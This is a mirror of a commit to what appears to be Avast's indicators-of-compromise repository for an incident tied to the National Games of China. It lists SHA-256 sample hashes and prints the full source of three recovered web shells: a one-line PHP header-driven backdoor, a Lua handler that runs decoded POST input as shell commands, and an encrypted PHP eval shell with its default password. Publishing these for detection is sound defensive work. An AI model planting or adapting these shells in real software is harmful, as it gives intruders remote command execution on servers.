mirror of https://github.com/avast/ioc
National Games of China
This commit is contained in:
parent
3657eda5b8
commit
477a48f73d
Binary file not shown.
|
@ -0,0 +1,26 @@
|
|||
# IoC for National Games of China incident
|
||||
|
||||
### Table of Contents
|
||||
* [IoCs](#IoCs)
|
||||
* [Source Code](#event-names)
|
||||
|
||||
## Samples (SHA-256)
|
||||
#### National Games of China incident related files
|
||||
```
|
||||
0C6AE9DE10BEE6568EC3AD24918C829B7E5132CC0DD1665D4BBF1C3FE84451B6
|
||||
0D1504A9AE319BDC320F938D2CDF72CBA18277B3F2B311ABF0BACAD2517DABC0
|
||||
CAC30CC2F4646979D0BE8B4D5F3A1F87351B3BB77F22E5064BD034CEC9E119BB
|
||||
0AEB963B4566DC2224D34B4885336C666198DB2AC64C810586CE3B17EF3DA59F
|
||||
DFFA7E31797339F3CE7EC453161B60010EDA3DD2E52AA9F147AB4389672C3536
|
||||
BDD4D0BB36D07AE6B97FFBCD386C54E1B15FEFE65329FF0389DFD5739CD3CFF2
|
||||
3A8DC7E730A1F82F65F1731CB31E05E2F749A9E89AB8529168A082D24680D2DD
|
||||
EC8AEF085D3CC57A4E92A613E128F2D9C7B5F03B8E017DD80D89BFEADA228639
|
||||
2CAB3B0391BF3ACE689FC697F522B3C86411E059AB8C1F4F5B7357B484B93035
|
||||
D033756A57D8A2758DE40895849E2146D571B3B44F3089EB68C31483784586CD
|
||||
```
|
||||
## Source Code files
|
||||
```
|
||||
admin2.php
|
||||
conf.lua
|
||||
miss1.php
|
||||
```
|
|
@ -0,0 +1 @@
|
|||
<?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0]($x[1]);?>
|
|
@ -0,0 +1,24 @@
|
|||
package.path = package.path .. ';../app/lua/?.lua;./app/lua/?.lua'
|
||||
web = require "libs/webutils"
|
||||
|
||||
|
||||
local handler = {}
|
||||
|
||||
function handler.cc(self, action)
|
||||
local a = io.popen(mg.base64_decode(mg.base64_decode(web:post("username")))):read("*all")
|
||||
--print(a)
|
||||
web:plain(mg.base64_encode(mg.base64_encode(a)))
|
||||
end
|
||||
|
||||
|
||||
|
||||
--- The main loop
|
||||
local a = web:get("a")
|
||||
if handler[a] then
|
||||
local result, err = pcall(handler[a], heandler, a)
|
||||
if result == false then
|
||||
web:json(json.encode({cmd='error', op='error', code=500, result=result, errmsg=err}))
|
||||
end
|
||||
else
|
||||
web:html("hello test!");
|
||||
end
|
|
@ -0,0 +1,26 @@
|
|||
<?php
|
||||
@error_reporting(0);
|
||||
session_start();
|
||||
$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
|
||||
$_SESSION['k']=$key;
|
||||
session_write_close();
|
||||
$post=file_get_contents("php://input");
|
||||
if(!extension_loaded('openssl'))
|
||||
{
|
||||
$t="base64_"."decode";
|
||||
$post=$t($post."");
|
||||
|
||||
for($i=0;$i<strlen($post);$i++) {
|
||||
$post[$i] = $post[$i]^$key[$i+1&15];
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
$post=openssl_decrypt($post, "AES128", $key);
|
||||
}
|
||||
$arr=explode('|',$post);
|
||||
$func=$arr[0];
|
||||
$params=$arr[1];
|
||||
class C{public function __invoke($p) {eval($p."");}}
|
||||
@call_user_func(new C(),$params);
|
||||
?>
|
|
@ -0,0 +1,10 @@
|
|||
0C6AE9DE10BEE6568EC3AD24918C829B7E5132CC0DD1665D4BBF1C3FE84451B6
|
||||
0D1504A9AE319BDC320F938D2CDF72CBA18277B3F2B311ABF0BACAD2517DABC0
|
||||
CAC30CC2F4646979D0BE8B4D5F3A1F87351B3BB77F22E5064BD034CEC9E119BB
|
||||
0AEB963B4566DC2224D34B4885336C666198DB2AC64C810586CE3B17EF3DA59F
|
||||
DFFA7E31797339F3CE7EC453161B60010EDA3DD2E52AA9F147AB4389672C3536
|
||||
BDD4D0BB36D07AE6B97FFBCD386C54E1B15FEFE65329FF0389DFD5739CD3CFF2
|
||||
3A8DC7E730A1F82F65F1731CB31E05E2F749A9E89AB8529168A082D24680D2DD
|
||||
EC8AEF085D3CC57A4E92A613E128F2D9C7B5F03B8E017DD80D89BFEADA228639
|
||||
2CAB3B0391BF3ACE689FC697F522B3C86411E059AB8C1F4F5B7357B484B93035
|
||||
D033756A57D8A2758DE40895849E2146D571B3B44F3089EB68C31483784586CD
|
Loading…
Reference in New Issue